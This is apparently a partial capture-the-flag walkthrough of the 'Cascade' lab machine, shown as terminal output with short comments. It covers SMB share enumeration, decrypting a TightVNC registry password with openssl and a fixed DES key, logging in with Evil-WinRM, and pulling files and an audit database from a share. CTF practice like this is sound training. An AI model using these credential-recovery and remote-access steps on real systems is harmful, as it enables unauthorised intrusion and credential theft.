➜ cascade find .
.
./Contractors
find: ‘./Contractors’: Permission denied
./Finance
find: ‘./Finance’: Permission denied
./IT
./IT/Email Archives
./IT/Email Archives/Meeting_Notes_June_2018.html
./IT/LogonAudit
./IT/Logs
./IT/Logs/Ark AD Recycle Bin
./IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
./IT/Logs/DCs
./IT/Logs/DCs/dcdiag.log
./IT/Temp
./IT/Temp/r.thompson
./IT/Temp/s.smith
./IT/Temp/s.smith/VNC Install.reg
./Production
find: ‘./Production’: Permission denied
./Temps
find: ‘./Temps’: Permission denied
The .html file
Found a password in 'VNC Install.reg'
➜ s.smith cat VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
these passwords are encrypted, i googled how to decrypt it, Found this github page https://github.com/frizb/PasswordDecrypts
➜ s.smith echo -n '6bcf2a4b6e5aca0f' | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |sT333ve2|
00000008
sT333ve2
With the username s.smith and password sT333ve2 i ll try to login
Got shell
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name s.smith
Full Name Steve Smith
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/28/2020 7:58:05 PM
Password expires Never
Password changeable 1/28/2020 7:58:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script MapAuditDrive.vbs
User profile
Home directory
Last logon 1/28/2020 11:26:39 PM
Logon hours allowed All
Local Group Memberships *Audit Share *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
I have access to the audit share
➜ www smbclient //10.10.10.182/Audit$ -U ""s.smith@cascade.local%sT333ve2""
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 23:31:26 2020
.. D 0 Wed Jan 29 23:31:26 2020
CascAudit.exe An 13312 Wed Jan 29 03:16:51 2020
CascCrypto.dll An 12288 Wed Jan 29 23:30:20 2020
DB D 0 Wed Jan 29 03:10:59 2020
RunAudit.bat A 45 Wed Jan 29 04:59:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 12:08:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 12:08:38 2019
x64 D 0 Mon Jan 27 03:55:27 2020
x86 D 0 Mon Jan 27 03:55:27 2020
6553343 blocks of size 4096. 1615281 blocks available
smb: \>
I saw there was a .db file so i downloaded it
smb: \> cd DB\
smb: \DB\> dir
. D 0 Wed Jan 29 03:10:59 2020
.. D 0 Wed Jan 29 03:10:59 2020
Audit.db An 24576 Wed Jan 29 03:09:24 2020
m
6553343 blocks of size 4096. 1615281 blocks available
smb: \DB\> mget Audit.db
Get file Audit.db? y
getting file \DB\Audit.db of size 24576 as Audit.db (15.6 KiloBytes/sec) (average 15.6 KiloBytes/sec)
viewing .db file with sqlite3
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite>
sqlite> select * from DeletedUserAudit
...> ;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
It has nothing of my interest. I ll download all the files from the audit share.
➜ www smbclient //10.10.10.182/Audit$ -U ""s.smith@cascade.local%sT333ve2""
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> recurse ON
smb: \> mget *
getting file \CascAudit.exe of size 13312 as CascAudit.exe (10.6 KiloBytes/sec) (average 42.8 KiloBytes/sec)
getting file \CascCrypto.dll of size 12288 as CascCrypto.dll (9.8 KiloBytes/sec) (average 40.0 KiloBytes/sec)
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 37.2 KiloBytes/sec)
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (84.6 KiloBytes/sec) (average 47.1 KiloBytes/sec)
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (70.9 KiloBytes/sec) (average 49.8 KiloBytes/sec)
getting file \DB\Audit.db of size 24576 as DB/Audit.db (19.7 KiloBytes/sec) (average 48.3 KiloBytes/sec)
getting file \x64\SQLite.Interop.dll of size 1639936 as x64/SQLite.Interop.dll (123.6 KiloBytes/sec) (average 74.8 KiloBytes/sec)
getting file \x86\SQLite.Interop.dll of size 1246720 as x86/SQLite.Interop.dll (110.1 KiloBytes/sec) (average 83.0 KiloBytes/sec)